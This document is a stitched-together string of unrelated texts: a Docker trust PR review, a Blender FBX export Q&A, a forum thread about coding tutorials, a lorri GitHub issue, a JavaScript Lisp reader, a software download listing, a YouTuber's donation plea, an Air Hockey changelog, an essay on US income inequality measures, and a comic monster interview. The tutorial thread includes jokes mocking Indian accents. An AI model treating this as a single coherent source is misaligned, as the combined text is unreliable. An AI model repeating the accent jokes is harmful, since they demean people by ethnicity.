This is a bit tricky: historically, all our inspect commands output JSON by default, allowing a custom format (--format), and for some commands a --pretty option to print in a more human-readable format. I realize that the JSON output is not very useful to quickly view information, so I definitely see a need for a default that's more readable. From a consistency perspective, though, docker trust inspect should output JSON. So what's the alternative? I was thinking of that a while back; perhaps we should start thinking of a new set of subcommands for Docker objects that default to a human-readable format; something like docker <object> print, docker <object> view or docker <object> show. If we can come to an agreement on that, the docker trust subcommand could be the first type of "object" to use such a command (e.g., docker trust view <repo>[:tag]). We can keep a docker trust inspect subcommand for later addition if we want.

docker trust sign and pushing

Wondering if it's always desirable to push the image, or if there should be an option to either make pushing optional, or to disable pushing. I just signed another image, and noticed it did a push before asking for my passphrase to sign the image. I did not expect that (in my mental model, signing and pushing are separate actions); I would've expected a confirmation to sign (and push) the image, especially since accidentally selecting the (wrong) image will overwrite existing images in the registry.

docker trust sign alternative keys?

Just wondering here: Is there a way to specify which key to sign an image with?
Could I have multiple keys, and need to specify which key to use? If so, should there be a docker trust keys subcommand, showing all keys that I have present?

Unauthorized shows HTTP status code

Not sure we should print HTTP status codes here; it feels like an implementation detail. If we do want more information, I'd be interested in what server returned that error (also, is that configurable? where can I find it?).

    $ docker trust sign foo:latest
    you are not authorized to perform this operation: server returned 401.

Instructions could use some formatting

The instructions when signing could use a bit of reformatting; it's quite a wall of text.

    $ docker trust sign thajeztah/testing:latest
    You are about to create a new root signing key passphrase. This passphrase will
    be used to protect the most sensitive key in your signing system. Please choose
    a long, complex passphrase and be careful to keep the password and the key file
    itself secure and backed up. It is highly recommended that you use a password
    manager to generate the passphrase and keep it safe. There will be no way to
    recover this key. You can find the key in your config directory.
    Enter passphrase for new root key with ID 9636fc9:
    Repeat passphrase for new root key with ID 9636fc9:
    Enter passphrase for new repository key with ID 94fb4d2:
    Repeat passphrase for new repository key with ID 94fb4d2:
    you are not authorized to perform this operation: server returned 401.
Quotes between repo and tag

    docker trust sign thajeztah/testing:latest
    Enter passphrase for root key with ID 9636fc9:
    Enter passphrase for new repository key with ID 19ba70d:
    Repeat passphrase for new repository key with ID 19ba70d:
    Enter passphrase for new thajeztah key with ID 9ae2e44:
    Repeat passphrase for new thajeztah key with ID 9ae2e44:
    Created signer: thajeztah
    Finished initializing signed repository for thajeztah/testing:latest
    The push refers to a repository [docker.io/thajeztah/testing]
    2d37a63fe311: Pushed
    db8bf4510ce1: Mounted from library/python
    4af7c20a45bb: Mounted from library/python
    07d54c9d22d6: Mounted from library/python
    590266e37bf8: Mounted from library/python
    ba2cc2690e31: Mounted from library/python
    latest: digest: sha256:43a0097ba50ce3a0547316a1142d7cc46062d051155f760e28619e8d99cddc25 size: 1579
    Signing and pushing trust metadata
    Enter passphrase for thajeztah key with ID 9ae2e44:
    Successfully signed "docker.io/thajeztah/testing":latest

In the last line, there are quotes around the repository, and the :latest tag is printed outside of the quotes: Successfully signed "docker.io/thajeztah/testing":latest

Also wondering if it should print the digest that was signed as well.

I think the most pressing issue that we should address in this PR is renaming

For Content Trust (and

We intentionally omitted this since it is repetitive information at present. I'd be inclined to add the prefix once we support multi-hashing - WDYT?
We intentionally omitted unsigned tags because they are unpullable with

We've discussed this at length with @dnephin: IIRC we agreed to potentially add JSON output controlled by a flag in the future - though as you mention this isn't consistent with other

We had initially named this command

If the image doesn't exist:

As for the ordering of push and signing: this mimics the behavior users are accustomed to from

We're actually just about to follow up with

This is also an issue in DCT: I'm happy to update this but I'd prefer this to be a separate PR to update both errors for consistency.

This is also from DCT and Notary, but I think this is necessary. It is a lot of text, but it is interactive and for entering sensitive passphrases.

This is an issue across both DCT and

It's printed a couple of lines above.
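The output-format tension discussed in this thread (JSON by default for inspect commands versus a human-readable view) can be illustrated with a toy renderer. Nothing here is docker's actual code; the column layout just mimics the sample output shown earlier.

```python
import json

def render_trust(rows, as_json=False):
    """Render signature rows either as JSON (machine-readable, the
    historical default for `inspect`) or as an aligned table (the
    human-readable `view` style). Illustrative only."""
    if as_json:
        return json.dumps(rows, indent=2)
    headers = ["REPOSITORY", "TAG", "DIGEST", "SIGNERS"]
    table = [headers] + [
        [r["repository"], r["tag"], r["digest"], r["signers"]] for r in rows
    ]
    # Pad each column to the widest cell in that column
    widths = [max(len(row[i]) for row in table) for i in range(len(headers))]
    return "\n".join(
        "   ".join(cell.ljust(widths[i]) for i, cell in enumerate(row)).rstrip()
        for row in table
    )
```

Shipping both behind one subcommand (a --format or --pretty flag) versus splitting into inspect/view is exactly the design question the reviewers are weighing.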
OPCFW_CODE
Why are two exported FBX files with the same nodes and property values rendering differently?

I've built a 3D environment that looks like this (I'm using the game engine Monogame, but I don't think the game engine plays a part in this problem). I'm using external assets for the terrain tiles, given as FBX files (in the graphics shown there are 4 such tiles). The way the FBX files come, they need the path to their texture updated. To get around this I import them into Blender (v3.4), make the necessary fixes, and re-export them as new FBX files (producing a version that the game engine is able to deal with).

Essentially, I found two ways to convert the FBX files: (1) updating the texture file reference, or (2) removing and recreating the material. While option 1 is more direct and obvious, I assumed it shouldn't be a problem to do 2 by copying over all material properties. But I'm not able to do this perfectly, getting a slightly darker render. It looks like I'm missing a configuration somewhere, possibly expressing something interesting. Whatever it is, I'm curious to know what is wrong with this idea, or where the hidden settings are.

Method 1

I import the external FBX from a new Blender document: deleting all existing objects, then File > Import > FBX (.fbx), choosing CPT_Terrain_M_f_13.fbx. I change the file reference of the existing Image Texture node (in the Shader Editor) to point to my own copy of the terrain texture CPT_Terrain_Texture_Atlas_01.png (located in my game-engine folder, the same directory that I export to below). It is also necessary to turn the Alpha up; for some reason the import comes with Alpha = 0 (perhaps it has something to do with the problem?). The only other change I make is 'Apply all transforms' (written into the export script). I complete the export by running this script (saving the terrain tile directly to the game engine folder).
Without any change to the game engine itself, if I now run my game it will show the top render.

    import bpy

    def exportFbx(filenamepath):
        bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)
        bpy.ops.export_scene.fbx(filepath=filenamepath, path_mode='STRIP', axis_up='Z')

    exportFbx('Z:\\github\\LSystemsMG\\LSystemsMG\\Content\\terrain-tiles\\CPT_Terrain_M_f_13.fbx')

Method 2

I start in the same way: (i) open a new Blender file, (ii) delete all objects, (iii) import the same FBX file. Now, instead of changing the existing texture, I delete and replace the existing material, creating a new Principled BSDF node and Material Output node; to these I add a new Image Texture node and Normal Map node so that they are the same as observed (i.e. I set Normal Map to 'Tangent Space' and draw a connection to the BSDF). With this, only the Specular and Roughness components in the Principled BSDF are different; otherwise all settings are the same. I then export the FBX using the same Python script. This leads my game to produce the second, darker render.

Properties seen

All the Material properties and properties in the Shader Editor are the same in both cases at time of export.

I found the answer; there are hidden properties in the materials not used by Blender but still exported with FBX and, evidently, used by external parties such as my game engine's shaders (Monogame). Searching with scripts I found quite a few obscure values, but there was only one that I needed to change in my case, namely, the default value for the Principled BSDF Base Color. Yes, there's a hidden value behind the texture node that is exported with FBX.
The value can be read:

    bsdf = bpy.data.objects[0].data.materials[0].node_tree.nodes['Principled BSDF']
    hidden_color_value = bsdf.inputs['Base Color'].default_value

In my case the new material I created needed to be updated from (0.8, 0.8, 0.8, 1) to (1, 1, 1, 1) to behave the same as the other:

    def setPrincipledBsdfBaseColorDefaultValue(r, g, b, a):
        bsdf = bpy.data.objects[0].data.materials[0].node_tree.nodes['Principled BSDF']
        bsdf.inputs['Base Color'].default_value = (r, g, b, a)

    setPrincipledBsdfBaseColorDefaultValue(1, 1, 1, 1)
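For hunting down more hidden values like this one, a small helper can walk every node input in a material and report its default_value. This is a sketch written against duck-typed objects, so in Blender you would pass it a bpy material (e.g. bpy.data.objects[0].data.materials[0]); the helper name is mine.

```python
def list_input_defaults(material):
    """Map (node name, input name) -> default_value for every node
    input that carries one, including values hidden behind connected
    texture nodes that Blender's UI doesn't surface."""
    found = {}
    for node in material.node_tree.nodes:
        for inp in node.inputs:
            # Some socket types (e.g. shader sockets) have no default_value
            if hasattr(inp, "default_value"):
                found[(node.name, inp.name)] = inp.default_value
    return found
```

Diffing the output of this helper between the Method 1 and Method 2 materials would have surfaced the (0.8, 0.8, 0.8, 1) vs (1, 1, 1, 1) Base Color mismatch directly.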
STACK_EXCHANGE
Frankly if the person making the YouTube video doesn't have an Indian accent then I'm moving on until I find the one that does. Microphone with a fan right next to it also applies "HEY GUYS IT'S DERPITDY123 HERE WITH ANOTHER VIDEO WHERE I SHOW YOU HOW TO DO WHATEVER WHILE I MAKE OUT WITH MY MICROPHONE!" Probably the most important part With the sound of the keyboard clacking. And the world's thickest Eastern European / Indian accent It's sarcasm, but with a healthy dose of truth behind it. One of those spammy aggregator websites that dominate Google results with Markov-generated content scraped off Quora and StackOverflow. halo tdai I'll be showng he to acquire Bob and vagene sorry bout that guys As an Indian who rarely faced issues where I have to go find a YouTube video for a solution, (I search for solution of the issue on the internet like a needle in a haystack. Stackoverflow, git issues, ubuntu forums, other relevant communities etc.), how helpful are the videos of my fellow Indians? Idk if it's sarcasm. nope just the sound of the computer fan and heavy breathing You can't miss the most important part of asking a question in stack overflow and being told by 30 scrubs that it's been asked before even though yours is an entirely different language or that you've already mentioned that a library used in the other question is blocked at your company. Even better - no sound at all Please do the needful and kindly like and subscribe I'd say exaggeration instead of sarcasm. All the Indian dudes I've seen explaining IT stuff are really understandable and have really helped me with uni Exactly why I do absolutely everything I can to avoid making a new topic. I’d rather search an issue for 2 days to find an answer even nearly relevant which I can adapt. I’m too scared of the folk on there. I’m not even certain I have an account, I can’t remember making one. I'm pretty sure 90% of them aren't even programmers but just love to copy/paste and yell at people... 
There are a lot more videos by Indian programmers it seems. Sometimes what I am looking for there are only videos by Indian programmers. Sometimes the accent is hard to follow and I have to rewind a bunch of times. But to me it means that Indian programmers make a strong effort to be helpful. It's very generous. texting that other guy in your class about an hour before the lab is due This!! Jesus Christ, this!!! Every freaking time I think I've found something relevant or useful. English is native tongue The Brits would disagree, and the Indian accent is because of the accent of our native languages. I speak Gujarati, Hindi and English, and that is just one of the dozens spoken around. English isn't the first thing an Indian learns to speak after they're born. With them typing in notepad This is exactly why I have a hard rule against using videos as any kind of reference. They all seem to be just pure and utter shit. For me as a German, they are nearly unwatchable with the accent. some random tutorial with thick indian accent At some point you're just making offerings to an internet deity to deliver you a working function, and not always a benevolent one. Not to mention you can skim a text tutorial but have to do skipping roulette with a video (and deal with the buffering) Those need to die. In fact, the American accent is the one butchering the way English is meant to be spoken.
OPCFW_CODE
Accept packages from the command line

As I understand, currently lorri requires shell.nix. I often create .envrc files like use nix -p node10 when I need some simple project-specific environment without the full power of nix expressions. It would be nice if I could write in .envrc something like eval $(lorri direnv -p node10) and get all the benefits of cached lorri environments.

You can already do that by passing --shell-file:

    > lorri direnv --help
    lorri-direnv 0.1.0
    Graham Christensen <EMAIL_ADDRESS>
    Emit shell script intended to be evaluated as part of direnv's .envrc, via: `eval "$(lorri direnv)"`

    USAGE:
        lorri direnv [OPTIONS]

    FLAGS:
        -h, --help       Prints help information
        -V, --version    Prints version information

    OPTIONS:
        --shell-file <nix_file>    The .nix file in the current directory to use [default: shell.nix]

Subcommands have their own --help, so not all options are listed in lorri --help.

Hi @Profpatsch. I know that I can use .nix files other than shell.nix with --shell-file, but that's not exactly what I wanted to do; I'd like to pass package names directly on the command line without a need to create any *.nix file, just like I can with nix-shell -p pkg1 pkg2.

Ah, hm, lorri has no concept of packages. Only .nix files. What would -p foo give you anyway that you cannot do with --shell-file foo/shell.nix?

As I understand, nix-shell generates a simple nix expression when a set of packages is passed on the command line; it just doesn't exist as a .nix file. It will make a difference for me for three reasons:

simplicity, as most of the time I just need a set of packages without the full power of nix expressions

I mostly use nix as a way to set up my local environment, so shell.nix shouldn't be committed to version control, so I will have to globally gitignore it and use git add -f when it shouldn't be ignored.
I have some direnv helpers that, for example, read the NodeJS version from .nvmrc and select the correct node version with nix-shell -p. I would like to use lorri instead, but it requires a real .nix file. As a workaround I could auto-generate shell.nix (or, say, .envrc.nix to avoid name conflicts) from direnv helpers, but it would be much easier if I could just pass the package names to lorri directly.

simplicity, as most of the time I just need a set of packages without the full power of nix expressions

shell.nix does effectively the same as:

    with import <nixpkgs> {};
    mkShell {
      buildInputs = [ <interpolate argument list here> ];
    }

We provide lorri init, which generates that file for you. We could, in principle, add an --expression argument which allows users to specify the expression on the command line instead of creating a (temporary) file first.

I have some direnv helpers that for example read NodeJS version from .nvmrc and select the correct node version with nix-shell -p. I would like to use lorri instead, but it requires a real .nix file.

Making lorri a drop-in for nix-shell is an interesting idea! I think in principle it's possible, but I wouldn't add it to the lorri binary itself, but as an optional wrapper script.

Having an --expression argument would be great, thanks for re-opening.
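The workaround mentioned above (auto-generating shell.nix from a package list) can be sketched in a few lines. The template follows the mkShell expression quoted in the thread; the package attribute name used in the example is only illustrative.

```python
def shell_nix_for(packages):
    """Render the shell.nix that `nix-shell -p pkg1 pkg2` implies,
    so the result can be handed to `lorri direnv --shell-file`."""
    return ("with import <nixpkgs> {};\n"
            "mkShell {\n"
            "  buildInputs = [ %s ];\n"
            "}\n" % " ".join(packages))
```

A direnv helper could write `shell_nix_for(["nodejs-10_x"])` to .envrc.nix after reading .nvmrc, then run `eval "$(lorri direnv --shell-file .envrc.nix)"`.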
GITHUB_ARCHIVE
var delimiters = {"(": true, ")": true, ";": true, "\r": true, "\n": true};
var whitespace = {" ": true, "\t": true, "\r": true, "\n": true};

var stream = function (_str, more) {
  return {pos: 0, string: _str, len: _35(_str), more: more};
};

var peek_char = function (s) {
  var ____id = s;
  var __pos = has(____id, "pos");
  var __len = has(____id, "len");
  var __string = has(____id, "string");
  if (__pos < __len) {
    return char(__string, __pos);
  }
};

var read_char = function (s) {
  var __c = peek_char(s);
  if (__c) {
    s.pos = s.pos + 1;
    return __c;
  }
};

var skip_non_code = function (s) {
  while (true) {
    var __c1 = peek_char(s);
    if (nil63(__c1)) {
      break;
    } else if (has63(whitespace, __c1)) {
      read_char(s);
    } else if (__c1 === ";") {
      while (__c1 && !(__c1 === "\n")) {
        __c1 = read_char(s);
      }
      skip_non_code(s);
    } else {
      break;
    }
  }
};

var read_table = {};
var eof = {};

var read = function (s) {
  skip_non_code(s);
  var __c2 = peek_char(s);
  if (is63(__c2)) {
    return (has(read_table, __c2) || has(read_table, ""))(s);
  } else {
    return eof;
  }
};

var read_all = function (s) {
  var __l = [];
  while (true) {
    var __form = read(s);
    if (__form === eof) {
      break;
    }
    add(__l, __form);
  }
  return __l;
};

read_string = function (_str, more) {
  var __x = read(stream(_str, more));
  if (!(__x === eof)) {
    return __x;
  }
};

var key63 = function (atom) {
  return string63(atom) && _35(atom) > 1 && char(atom, edge(atom)) === ":";
};

var flag63 = function (atom) {
  return string63(atom) && _35(atom) > 1 && char(atom, 0) === ":";
};

var expected = function (s, c) {
  if (is63(s.more)) {
    return s.more;
  } else {
    throw new Error("Expected " + c + " at " + s.pos);
  }
};

var wrap = function (s, x) {
  var __y = read(s);
  if (__y === s.more) {
    return __y;
  } else {
    return [x, __y];
  }
};

var hex_prefix63 = function (_str) {
  var __e;
  if (code(_str, 0) === 45) {
    __e = 1;
  } else {
    __e = 0;
  }
  var __i = __e;
  var __id1 = code(_str, __i) === 48;
  var __e1;
  if (__id1) {
    __i = __i + 1;
    var __n = code(_str, __i);
    __e1 = __n === 120 || __n === 88;
  } else {
    __e1 = __id1;
  }
  return __e1;
};

var maybe_number = function (_str) {
  if (hex_prefix63(_str)) {
    return parseInt(_str, 16);
  } else if (number_code63(code(_str, edge(_str)))) {
    return number(_str);
  }
};

var real63 = function (x) {
  return number63(x) && ! nan63(x) && ! inf63(x);
};

read_table[""] = function (s) {
  var ___str = "";
  while (true) {
    var __c3 = peek_char(s);
    if (__c3 && (! has63(whitespace, __c3) && ! has63(delimiters, __c3))) {
      ___str = ___str + read_char(s);
    } else {
      break;
    }
  }
  if (___str === "true") {
    return true;
  } else if (___str === "false") {
    return false;
  } else {
    var __n1 = maybe_number(___str);
    if (real63(__n1)) {
      return __n1;
    } else {
      return ___str;
    }
  }
};

read_table["("] = function (s) {
  read_char(s);
  var __r16 = undefined;
  var __l1 = [];
  while (nil63(__r16)) {
    skip_non_code(s);
    var __c4 = peek_char(s);
    if (__c4 === ")") {
      read_char(s);
      __r16 = __l1;
    } else if (nil63(__c4)) {
      __r16 = expected(s, ")");
    } else {
      var __x2 = read(s);
      if (key63(__x2)) {
        var __k = clip(__x2, 0, edge(__x2));
        var __v = read(s);
        __l1 = object(__l1);
        __l1[__k] = __v;
      } else if (flag63(__x2)) {
        __l1 = object(__l1);
        __l1[clip(__x2, 1)] = true;
      } else {
        add(__l1, __x2);
      }
    }
  }
  return __r16;
};

read_table[")"] = function (s) {
  throw new Error("Unexpected ) at " + s.pos);
};

read_table["\""] = function (s) {
  read_char(s);
  var __r19 = undefined;
  var ___str1 = "\"";
  while (nil63(__r19)) {
    var __c5 = peek_char(s);
    if (__c5 === "\"") {
      __r19 = ___str1 + read_char(s);
    } else if (nil63(__c5)) {
      __r19 = expected(s, "\"");
    } else {
      if (__c5 === "\\") {
        ___str1 = ___str1 + read_char(s);
      }
      ___str1 = ___str1 + read_char(s);
    }
  }
  return __r19;
};

read_table["|"] = function (s) {
  read_char(s);
  var __r21 = undefined;
  var ___str2 = "|";
  while (nil63(__r21)) {
    var __c6 = peek_char(s);
    if (__c6 === "|") {
      __r21 = ___str2 + read_char(s);
    } else if (nil63(__c6)) {
      __r21 = expected(s, "|");
    } else {
      ___str2 = ___str2 + read_char(s);
    }
  }
  return __r21;
};

read_table["'"] = function (s) {
  read_char(s);
  return wrap(s, "quote");
};

read_table["`"] = function (s) {
  read_char(s);
  return wrap(s, "quasiquote");
};

read_table[","] = function (s) {
  read_char(s);
  if (peek_char(s) === "@") {
    read_char(s);
    return wrap(s, "unquote-splicing");
  } else {
    return wrap(s, "unquote");
  }
};

exports.stream = stream;
exports.read = read;
exports["read-all"] = read_all;
exports.read_all = read_all;
exports["read-string"] = read_string;
exports.read_string = read_string;
exports["read-table"] = read_table;
exports.read_table = read_table;
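The structure of the reader above is a dispatch table keyed on the next character, with "" as the fallback atom reader. That pattern can be sketched in a few dozen lines of Python; everything here is illustrative and heavily stripped down from the JavaScript (no comments, strings, keywords, or quoting).

```python
# Minimal sketch of the read-table dispatch pattern.
def stream(s):
    return {"string": s, "pos": 0}

def peek_char(st):
    return st["string"][st["pos"]] if st["pos"] < len(st["string"]) else None

def read_char(st):
    c = peek_char(st)
    if c is not None:
        st["pos"] += 1
    return c

WHITESPACE = set(" \t\r\n")
DELIMITERS = set("();\r\n")
read_table = {}

def read(st):
    # Skip whitespace, then dispatch on the next character,
    # falling back to the "" handler for plain atoms.
    while peek_char(st) in WHITESPACE:
        read_char(st)
    c = peek_char(st)
    if c is None:
        return None
    return read_table.get(c, read_table[""])(st)

def read_atom(st):
    tok = ""
    while True:
        c = peek_char(st)
        if c is None or c in WHITESPACE or c in DELIMITERS:
            break
        tok += read_char(st)
    return int(tok) if tok.lstrip("-").isdigit() else tok

def read_list(st):
    read_char(st)  # consume "("
    items = []
    while True:
        while peek_char(st) in WHITESPACE:
            read_char(st)
        if peek_char(st) == ")":
            read_char(st)
            return items
        if peek_char(st) is None:
            raise SyntaxError("Expected ) at %d" % st["pos"])
        items.append(read(st))

read_table[""] = read_atom
read_table["("] = read_list
```

Adding a new syntax (quote, strings, comments) is then just another entry in read_table, which is what the JavaScript does with "'", "\"", "`", and ",".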
STACK_EDU
Hey guys. I unfortunately have a bit of bad news. My very first car is finally reaching its end after owning it for a couple years. (It's a used car that's 12 years old.) I sent it in to the repair shop and it's going to cost over half of my savings to get it repaired. At that point it's not even worth it, so I'm going to have to buy a new used car. The problem is this is going to cost a LOT of money. I don't use my car often, I only use it to pick up/drop off my little sister to and from school, and the occasional grocery trip or fast food stop. If I don't get more support in these upcoming months, I will most likely have to get a part time job of some sort, thus resulting in fewer and fewer remixes, and honestly I do not want that. I love making remixes for you guys nearly weekly and it would pain me greatly to have to stop. If you or someone you know have any possible way of supporting me, whether it's Patreon, commissioning me, buying my Undertale album, or just straight up donating to my paypal, it would honestly mean the world to me and every single little bit will add up. If everyone gave even a dollar that would be more than enough for my situation. If you can't do any of these, sharing my message with others would help immensely. There are links down below to everything I mentioned. Thank you for taking the time to read this and please enjoy the remix.
[HELP SUPPORT FUNDS FOR A NEW CAR VVVVVV]
➤Donations: https://www.paypal.me/retrospecter
➤Patreon: https://www.patreon.com/retrospecter
➤Commissions: http://bit.ly/2yGmXBu

Undertale Album:
➤iTunes: http://apple.co/2kBXQZr
➤Google Play: http://bit.ly/2kC4wH0
➤Spotify: http://bit.ly/2jMt9ws

►Main art: http://bit.ly/2hT7Bj0 http://bit.ly/2zEwxmh
►Retro fanart: https://twitter.com/ShadeEn_p/status/919754019383455750
►Animated Retro Icon by: https://twitter.com/spicybu
►MP3: https://soundcloud.com/retro_specter/cupheadfloral-fury-remix-retrospecter

[OTHER SOCIAL MEDIA LINKS]
►DISCORD: https://discord.gg/retrospecter
►SUBSCRIBE: http://bit.ly/1NHd09J
►EMAIL (for business inquiries): firstname.lastname@example.org
►TWITTER: https://twitter.com/TheRetroSpecter
►TWITCH: https://www.twitch.tv/theretrospecter
►DEVIANTART: http://retro-specter.deviantart.com/
►SOUNDCLOUD: https://soundcloud.com/retro_specter
►TUMBLR: https://theretrospecter.tumblr.com/
►STEAM: https://steamcommunity.com/groups/TheRetroSpecter
Stimulsoft Reports.Wpf with Source Code 2009.1
Stimulsoft Reports.Wpf is a powerful reporting tool for WPF.
Company: Stimulsoft
Platform: Win98, WinME, WinXP, WinNT 4.x, Windows 2000, Windows 2003
Size: 12553 KB
Price: USD $999.95
Release Date: 2009-06-29
Category: Development::C / C / C#
WPF is the Windows Presentation Foundation platform. Stimulsoft Reports.Wpf is the reporting tool that is developed for Windows Presentation Foundation. Do you need a reporting tool for WPF? No need to surf the internet - use Stimulsoft Reports.Wpf. All the power of WPF is used. Rich abilities of rendering, viewing, printing and exporting reports - and all this is Stimulsoft Reports.Wpf.
Related Titles:
- Falco Free XLS Library 4.7 - Free Excel Library for Saving/Loading. VC++. Delphi.
- Falco Free Animated GIF Library 3.7 - Loading and Save. C++ and Delphi samples. Show Animated GIF. Delphi and VC++.
- Falco Free Script Processor 4.1 - Falco Free Script Processor Library. VC++. Delphi.
- Entity Developer for NHibernate 5.5 - Powerful visual NHibernate designer and code and mapping generator
- Entity Developer for Entity Framework 5.5 - Visual model designer and code generation tool for ADO.NET Entity Framework
- PDF Metamorphosis .Net 18.104.22.168 - HTML to PDF, RTF to PDF with managed C# library
- RTF to HTML DLL .Net 22.214.171.124 - RTF to HTML DLL .Net Software
- abtoVNC Android Viewer SDK 1.4 - abtoVNC viewer SDK for Android. Remote desktop viewer for Android tool
- MTuner 2012.4 - C/C++ Memory profiler and analyzer with multi platform support
- Virtual Camera SDK 1.1 - Fake webcam software Virtual Camera SDK. Build custom virtual camera tool
- AthTek Code to FlowChart 2.0 - Automatically generate elegant flowchart or NS chart, to let code visual.
- abtoVNC iOS Viewer SDK 2.0 - abtoVNC Viewer for iOS SDK. Create remote desktop software for iOS devices
Copyright © 2000 - 2013 FreeSharewareCenter.com - Freeware and Shareware Download Center. All Rights Reserved.
Thanks to all the millions of Air Hockey players out there! We dragged Air Hockey, kicking and screaming, into iOS 10 happiness. As you know, Air Hockey's been around a while. You wouldn't believe the mess we found in there. So, we ripped off some bandages, stripped out the baling wire, and had to melt off some duct tape - but here it is! Here's what's new:
- 64 BITS OF GOODNESS! You won't see that warning about the developer needing to do an update anymore. Air Hockey, however, still runs exactly as awesomely fast as it ever did.
- Added support for iPad Pro along with all the latest iPhone models & screen sizes.
- Melted & reformed the menu code. (We'll add that replay button some day...it didn't make this version though.)
- Taught the AI some new tricks. The computer player is now a little smarter/different and better at using the whole table.
- Reflowed the goal detection logic to make sure we always catch those sneaky pucks.
- Made the Air Hockey logo shiny and happy again...and it sits where we told it to.
- Fixed the middle-of-the-screen pause screen double tap button placement. It was trying to get away.
- Fancied up the menu background translucent coloring a bit.
- New launch screen. Some devices & iOS versions saw some odd behavior in the last version. No more!
- Reworked the device rotation code. You absolutely won't notice a difference, but it looks so much nicer under the hood.
- OK. Would you believe that until now Air Hockey still used a modified version of the way-long-gone OpenFeint to handle Game Center? It was messy. MESSY. We had to use a chainsaw and leaf blower, but it's all gone & replaced with sweet native Game Center code. (Please please let us know if you can find any Game Center, ummm, "integration issues" that are still hanging around.)
- Did some really minor graphics tweaks in a couple places. There was a speck that was a quarter pixel off. Kicked it!
- Killed some sound bugs.
- So many little odds & ends that we forgot them all.
We did stuff. It was good. There was much rejoicing. Secret developer note from days of old: Did you know that the goal sounds in Air Hockey were recorded by sliding a plastic air hockey puck across a granite kitchen counter top into a glass mixing bowl with a wash cloth in it? It took about 100 tries plus some editing to get the few goal sounds we use in the game. Those were the days!
You have probably seen the recent headlines saying that US income inequality has reached a 50-year high. They are based on the Census Bureau’s latest report on Income and Poverty in the United States, published last month. The Census Bureau’s data, however, ignore taxes, as well as non-cash benefits such as Medicare. They measure inequality in a hypothetical tax-free world. The data include cash benefits (such as unemployment benefits and social security), but they ignore non-cash benefits (such as, importantly, health benefits, as well as food stamps and subsidized housing). And they measure income before all taxes and social security fees are taken out. In other words, the Census Bureau inequality measure ignores the impact of the redistribution policies we have put in place to reduce inequality. Therefore, it makes a misleading basis for a policy debate. Yet most discussions of income inequality seem to be based on pre-tax income measures. A better starting point would be to ask: “how well are income redistribution policies working, and what else should we do?” The Congressional Budget Office (CBO) publishes data on income inequality after taxes and transfers; these data paint a different picture when compared with the Census Bureau’s data. Note that the latest CBO report, published last July, has data only from 1979 and up to 2016, whereas the Census Bureau’s data go to 2018 (and start in 1967); in the comparison we are therefore missing the developments of the last two years. Inequality after taxes and transfers increased sharply between 1979 and 1986. It dropped through the mid-1990s, then rose again. But for the last twenty years (1997-2016), income inequality after taxes and transfers has remained broadly unchanged. In fact it was lower in 2016 than in 1986. The chart below shows the CBO measure of inequality, after taxes and transfers, and compares it to the Census Bureau measure, which ignores taxes and non-cash benefits. 
Both are Gini coefficients, so a value of 0 would represent perfect equality, and a value of 1 maximum inequality (all income going to one individual). This does not mean that inequality is not high, or that it's not a problem. We might want to reduce it back to the levels of 1979, or of the mid-1990s. However, it is simply not true that income inequality has gotten worse over the last twenty years (again, with the caveat that the CBO does not have post-tax data for the last two years). Over the last two decades, taxes and social programs have done exactly what they were designed to do: they kept inequality largely in check, offsetting a widening disparity in pre-tax incomes. This is extremely important because data on income inequality inform our public debate on redistribution policies. And to see how well our redistribution policies are working, we need to look at incomes after taxes and transfers. We care about differences in standards of living, and these are based on incomes after taxes and transfers. We can address the inequality in post-taxes-and-transfers income with additional changes to taxes and social benefits. Of course, that will not change inequality in pre-tax income. Inequality in pre-tax incomes can give us valuable insights into what is happening in our economy, for example the changing market value of education levels and skills; it can raise questions on corporate governance, as when looking at CEO pay in the US versus other advanced economies. But it does not tell us what's happening to inequality in living standards. We should always debate the degree of income inequality that we are willing to tolerate as a society. It is a political choice that needs to balance considerations of equity and economic incentives. But the debate must start from measures of the inequality we still have after all the actions we have already taken to reduce it—it cannot start by pretending that there are no taxes and social benefits.
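For readers who want to experiment with the measure itself, the Gini coefficient is easy to compute directly. A minimal Python sketch, using made-up incomes rather than the Census Bureau's or CBO's actual microdata:

```python
def gini(incomes):
    """Gini coefficient of a list of incomes, via the standard
    sorted-values closed form:
    G = (2 * sum_i (i+1) * x_i) / (n * sum(x)) - (n + 1) / n."""
    xs = sorted(incomes)
    n = len(xs)
    total = sum(xs)
    weighted = sum((i + 1) * x for i, x in enumerate(xs))
    return (2 * weighted) / (n * total) - (n + 1) / n

# Perfect equality gives 0; concentrating all income approaches 1.
print(gini([50_000] * 5))           # 0.0
print(gini([0, 0, 0, 0, 100_000]))  # 0.8
```

Whether you feed this pre-tax or post-tax-and-transfer incomes is exactly the choice the essay is about: the same formula on the same households gives the Census-style or the CBO-style number.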
OOKABOOKA!!!!!!!
The battlecry of the dreaded OOKABOOKA is all an unprepared adventurer will hear before he/she is ripped apart, stabbed, decapitated, incapacitated, incapacitated and decapitated, crushed, or generally killed. Only one man has ever lived to see them, and here he is, DOCTOR MUH!!!
DOCTOR MUH: What?
Interviewer: The OOKABOOKA?
DOCTOR MUH: Come again?
Interviewer: Ugh, THE OKKABOOKA!!!
DOCTOR MUH: WHAT!? WHERE!? *pulls out glock*
Interviewer: OH MY GOD!
DOCTOR MUH: COME ON OUT, OOKABOOKA! I GOT A GLOCK FOR YOU!
Interviewer: There's no OOKABOOKA!
DOCTOR MUH: What? Oh, no OOKABOOKA... um... you won't tell security, will you?
Interviewer: Not if you put that away and we can carry on with the interview...
DOCTOR MUH: Capital! Now, what did you want to know?
Interviewer: How did you find the OOKABOOKA?
DOCTOR MUH: Oh, that's quite the tale. I was on an expedition with my two colleagues Doctor Faiklicence and Professor Glass and my pet Poptop, Moomuh, on a high threat level planet called Sheeba. We were exploring its dense jungles with three armed guards when we heard somebody yell "OOKABOOKA!!!!!!", scaring one of our guards into shooting Prof. Glass in the foot. I'm guessing Moomuh was scared, because he was chewing on my arm.
Interviewer: Ah, that explains your arm being gone...
DOCTOR MUH: DON'T STARE AT IT! *sobs*
Interviewer: OK, I won't... now, you were saying?
DOCTOR MUH: Oh, yes... um... Like I was saying, I served in Solar War VII as a gunner on the ship Howitzer II and-
Interviewer: The OOKABOOKA?
DOCTOR MUH: WHAT!? HERE!? *pulls out Assault Rifle*
Interviewer: NOOOOO!!!!
DOCTOR MUH: COME ON OUT OOKABOOKA! I GOT SOME INCENDIARY ROUNDS READY FOR YOU!!
Interviewer: THE OOKABOOKA ARE NOT HERE!!
DOCTOR MUH: Oh, you sure?
Interviewer: YES!
